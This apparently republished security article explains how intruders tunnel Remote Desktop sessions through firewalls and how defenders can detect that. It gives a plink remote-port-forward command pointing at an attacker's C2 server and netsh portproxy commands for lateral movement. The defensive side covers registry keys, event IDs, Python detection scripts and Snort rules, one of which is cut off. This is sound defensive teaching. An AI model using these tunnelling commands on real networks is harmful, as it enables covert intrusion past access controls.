2025-04-07 Update From: SLTechnology News&Howtos > Development
Shulou (Shulou.com) 06/02 Report
In this issue, Xiaobian explains how attackers bypass network restrictions through RDP tunnels. The article is rich in content and analyses the topic from a professional perspective; I hope you gain something from reading it.
Remote Desktop Services is a Windows component that companies use to give system administrators, operations staff, and remote employees convenient access. On the other hand, Remote Desktop Services, and the Remote Desktop Protocol (RDP) in particular, is equally convenient for network attackers. Once an intruder has established a foothold in the target network and obtained sufficient login credentials, they may switch from a backdoor to direct remote access over RDP sessions. Because the attacker's remote access then rides on legitimate-looking traffic, the intrusion becomes much harder to detect.
Breaking Network Access Rules with RDP
Attackers prefer RDP for its stability and functionality over non-graphical backdoors, which may leave unwanted traces on a system. As a result, FireEye often observes attackers using the native Windows RDP client to connect between systems in restricted environments. Traditionally, corporate networks that are not exposed to the internet and are protected by firewall and NAT rules were considered unlikely to receive inbound RDP connections. Attackers, however, increasingly use network tunneling and host-based port forwarding to break these network access control rules.
Network tunneling and port forwarding exploit firewall "gaps" (ports the firewall leaves open so that applications can reach host services inside the firewalled network) to establish connections to remote servers that the firewall would otherwise block. Once such a connection through the firewall exists, it can be used as a transport to send and receive data across the firewall, or to establish a "tunnel" that listens for a service located inside the firewall and makes it reachable from the remote server outside, as shown in Figure 1.
Figure 1: An example of breaching an enterprise firewall using RDP and SSH tunneling
Inbound RDP Tunneling
The utility typically used to tunnel an RDP session is PuTTY Link, commonly called Plink. Plink can establish SSH connections to other systems using arbitrary source and destination ports. Because many network environments either do not enforce protocol inspection or do not block outbound SSH traffic, attackers can create an encrypted Plink tunnel that exposes the RDP port of a compromised system to the attacker's C2 server.
Common Plink command:
plink.exe <user>@<C2 server> -pw <password> -P 22 -2 -4 -T -N -C -R 12345:127.0.0.1:3389
The -R 12345:127.0.0.1:3389 option is a remote port forward: port 12345 on the attacker's SSH server is mapped back to TCP 3389 on the compromised host, while -N and -T open the SSH session without a shell or terminal.
Figure 2. Successfully creating an RDP tunnel using Plink
Figure 3. Attacker uses the victim's tunnel to the C2 server for an RDP session
Note that for an attacker to reach the RDP port of the target network, they must already have gained access to the network by other means in order to upload the program that builds the communication tunnel. For example, an attacker may start with a phishing email and gain a foothold in the target network through a malicious program. After establishing the foothold, they gradually collect credentials and escalate privileges. Tunneling an RDP session into a restricted network environment is one of many common access methods used by attackers.
Lateral Movement via an RDP Springboard (Jump Box)
RDP is not only a perfect tool for external access to the target network; RDP sessions can also be chained across multiple systems to move laterally through the environment. FireEye has observed attackers using the native Windows netsh command to set up RDP port forwarding on a springboard (jump box) in order to reach another restricted network segment.
netsh port forwarding command (full and abbreviated forms):
netsh interface portproxy add v4tov4 listenport=8001 listenaddress=<springboard IP> connectport=3389 connectaddress=<destination IP>
netsh I p a v l=8001 listena=<springboard IP> connectp=3389 c=<destination IP>
In this example the attacker configures the springboard to listen on an arbitrary port for traffic sent from the previously compromised network. That traffic is then forwarded through the springboard directly to a system on the other network, on a chosen port, including the default RDP port TCP 3389. This form of RDP port forwarding gives the attacker a way to use the springboard's permitted routes, and since it is done by modifying the registry, it does not interrupt legitimate administrators who are using the springboard in an ongoing RDP session.
Figure 4 Lateral movement to other segments via springboard
Prevention and Detection of RDP Tunnels
If RDP is enabled, an attacker can move laterally and maintain presence in the target network via tunneling or port forwarding. To mitigate and detect these types of RDP attacks, corporate security operations staff should focus on both host-based and network-based protection and detection mechanisms.
Host-based protection:
Remote Desktop Services: Disable Remote Desktop Services on all end-user workstations and systems when remote connectivity is not required.
Host-based firewall: Enable host-based firewall rules to explicitly deny inbound RDP connections.
Local accounts: Prevent remote logons using local accounts on workstations by enabling the "Deny log on through Remote Desktop Services" security setting.
Host-based detection:
Registry keys:
Review the registry keys associated with Plink connections, which may store information identifying specific source and destination addresses. By default, both PuTTY and Plink store session information and previously connected SSH servers in the following registry keys on Windows systems:
HKEY_CURRENT_USER\Software\SimonTatham\PuTTY
HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\SshHostKeys
Similarly, the following Windows registry key stores the PortProxy configuration created with netsh:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4
Collecting and reviewing these registry entries can distinguish legitimate from unusual SSH tunneling activity. Further review of the entries may be necessary to confirm the purpose of each one.
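A way to carry out the PortProxy review described above, as an added example (not code from the article or from FireEye). It assumes the PortProxy layout used by netsh, where each value under the v4tov4\tcp subkey is named "listenaddress/listenport" and holds "connectaddress/connectport"; the sample values are constructed so the script runs offline, and the live registry read is only attempted on Windows.

```python
"""Review netsh PortProxy entries for forwards that land on the RDP port."""

# Subkey that netsh writes v4tov4 TCP forwards to (assumed layout, see lead-in).
PORTPROXY_KEY = r"SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4\tcp"

# Constructed sample: what an export of the key above could contain.
SAMPLE_VALUES = {
    "10.0.5.40/8001": "192.168.20.15/3389",   # mirrors the netsh example
    "0.0.0.0/8443": "10.0.9.2/443",           # unrelated forward, ignored
}


def parse_portproxy(values):
    """Turn {'laddr/lport': 'caddr/cport'} into a list of forward records."""
    forwards = []
    for name, data in values.items():
        laddr, lport = name.rsplit("/", 1)
        caddr, cport = data.rsplit("/", 1)
        forwards.append({"listen": (laddr, int(lport)),
                         "connect": (caddr, int(cport))})
    return forwards


def rdp_forwards(values, rdp_port=3389):
    """Forwards whose destination is the RDP port: the ones to review first."""
    return [f for f in parse_portproxy(values) if f["connect"][1] == rdp_port]


def read_live_portproxy():
    """Read the real key on Windows; return an empty dict elsewhere."""
    try:
        import winreg
    except ImportError:          # not Windows
        return {}
    values = {}
    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, PORTPROXY_KEY) as key:
            index = 0
            while True:          # EnumValue raises OSError past the last value
                name, data, _ = winreg.EnumValue(key, index)
                values[name] = data
                index += 1
    except OSError:              # key absent or enumeration finished
        pass
    return values


if __name__ == "__main__":
    for fwd in rdp_forwards(read_live_portproxy() or SAMPLE_VALUES):
        print("forward to RDP: %s:%d -> %s:%d" % (*fwd["listen"], *fwd["connect"]))
```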
Event logs:
Review the full record of logon events. Common RDP logon events are recorded in the following event logs on Windows systems:
%systemroot%\Windows\System32\winevt\Logs\Microsoft-TerminalServices-LocalSessionmanagerOperational.evtx
%systemroot%\Windows\System32\winevt\Logs\Security.evtx
The TerminalServices-LocalSessionManager log records successful local or remote interactive logons as EID 21, and successful reconnections to a previously established RDP session that the user did not log off as EID 25. The Security log records a Remote Interactive (RDP) logon as EID 4624 with logon type 10. A source IP address recorded as a local host address (127.0.0.1 - 127.255.255.255) indicates that an attacker may have used a port forwarder to tunnel the logon to port 3389.
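The loopback check described above, as an added example (not code from the article or from FireEye): it scans event records from both logs and reports RDP logons whose source address is a loopback address. The records are constructed samples shaped like the EventData fields of EID 4624, 21 and 25; the field names are assumptions standing in for whatever your log export produces.

```python
"""Flag RDP logons that arrived through a local port forwarder."""
import ipaddress

# Constructed sample records mimicking EventData fields of the two logs.
SAMPLE_EVENTS = [
    {"log": "Security", "eid": 4624, "LogonType": "10",
     "TargetUserName": "admin", "IpAddress": "10.0.5.23"},      # normal RDP
    {"log": "Security", "eid": 4624, "LogonType": "10",
     "TargetUserName": "svc_backup", "IpAddress": "127.0.0.1"}, # tunneled
    {"log": "Security", "eid": 4624, "LogonType": "3",
     "TargetUserName": "admin", "IpAddress": "127.0.0.1"},      # network, not RDP
    {"log": "TerminalServices-LocalSessionManager", "eid": 25,
     "User": "CORP\\svc_backup", "Address": "127.0.0.1"},       # reconnect
    {"log": "TerminalServices-LocalSessionManager", "eid": 21,
     "User": "CORP\\jdoe", "Address": "10.0.5.40"},             # normal logon
    {"log": "Security", "eid": 4624, "LogonType": "10",
     "TargetUserName": "ops", "IpAddress": "-"},                # no address
]


def is_loopback(addr):
    """True for 127.0.0.0/8 and ::1; False for '-', 'LOCAL' or empty fields."""
    try:
        return ipaddress.ip_address(addr).is_loopback
    except ValueError:
        return False


def is_rdp_logon(ev):
    """True for events that represent an RDP session start or reconnect."""
    if ev["log"] == "Security":
        return ev["eid"] == 4624 and ev["LogonType"] == "10"
    if ev["log"] == "TerminalServices-LocalSessionManager":
        return ev["eid"] in (21, 25)
    return False


def find_tunneled_rdp(events):
    """Return (log, eid, user, address) for RDP logons sourced from loopback."""
    hits = []
    for ev in events:
        if not is_rdp_logon(ev):
            continue
        addr = ev.get("IpAddress") or ev.get("Address") or ""
        if is_loopback(addr):
            user = ev.get("TargetUserName") or ev.get("User")
            hits.append((ev["log"], ev["eid"], user, addr))
    return hits


if __name__ == "__main__":
    for hit in find_tunneled_rdp(SAMPLE_EVENTS):
        print("possible tunneled RDP logon:", hit)
```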
Check for traces of the `plink.exe` program. Note that attackers can rename programs to avoid detection. Relevant traces include, but are not limited to:
Application Compatibility Cache (Shimcache)
Amcache: Amcache.hve records the execution path, last execution time, and SHA1 hash of executed applications
Jump Lists: on Windows 7-10, the taskbar's record of frequently used or recently used items
Prefetch
Service events
CCM Recently Used Apps from the WMI repository
Registry keys
Network-based prevention:
Remote connection: Forces the connection to be initiated from a specified host or centralized management server in cases where an RDP connection is required.
Domain accounts: Use the "Deny login through Remote Desktop Services" security setting for privileged accounts (such as domain administrators) and service accounts because these types of accounts are often used by attackers to move laterally to sensitive areas of the network.
Network-based detection:
Firewall rules: Review existing firewall rules to identify where port forwarding could be abused. Besides preventing the use of port forwarders, internal communication between workstations in the environment should also be monitored. Workstations typically do not need to communicate directly with each other, and firewall rules can block any such communication unless it is needed.
Network traffic: Perform content and protocol checks of network traffic. Not all traffic communicated on a given port is normal traffic or protocol compliant traffic. For example, an attacker could establish an RDP tunnel with a remote server using TCP port 80 or 443. An in-depth examination of network traffic may reveal that it's actually not HTTP or HTTPS, but something completely different. Therefore, security operators should closely monitor their network traffic.
Snort rules: RDP traffic arriving on a well-known low port may mean that an RDP tunnel has been established. Here are two sample Snort rules that can help security teams identify RDP tunnels in their network traffic.
alert tcp any [21,22,23,25,53,80,443,8080] -> any !3389 (msg:"RDP - HANDSHAKE [Tunneled msts]"; dsize:
alert tcp any [21,22,23,25,53,80,443,8080] -> any !3389 (msg:"RDP - HANDSHAKE [Tunneled]"; flow:established; content:"|c0 00| Duca"; depth:250; content:"rdpdr"; content:"cliprdr"; sid:2; rev:1;)
Conclusion
The advent of RDP provides users with greater freedom and interoperability. But as more attackers use RDP to cross access-restricted networks and move laterally, security teams are facing the challenge of distinguishing between legitimate and malicious RDP traffic. Therefore, appropriate host and network-based prevention and detection methods should be adopted to proactively monitor and be able to identify malicious RDP usage.
The above is how attackers bypass network restrictions through RDP tunnels, as shared with everyone. If you have a similar doubt, refer to the analysis above. To learn more, please follow the industry information channel.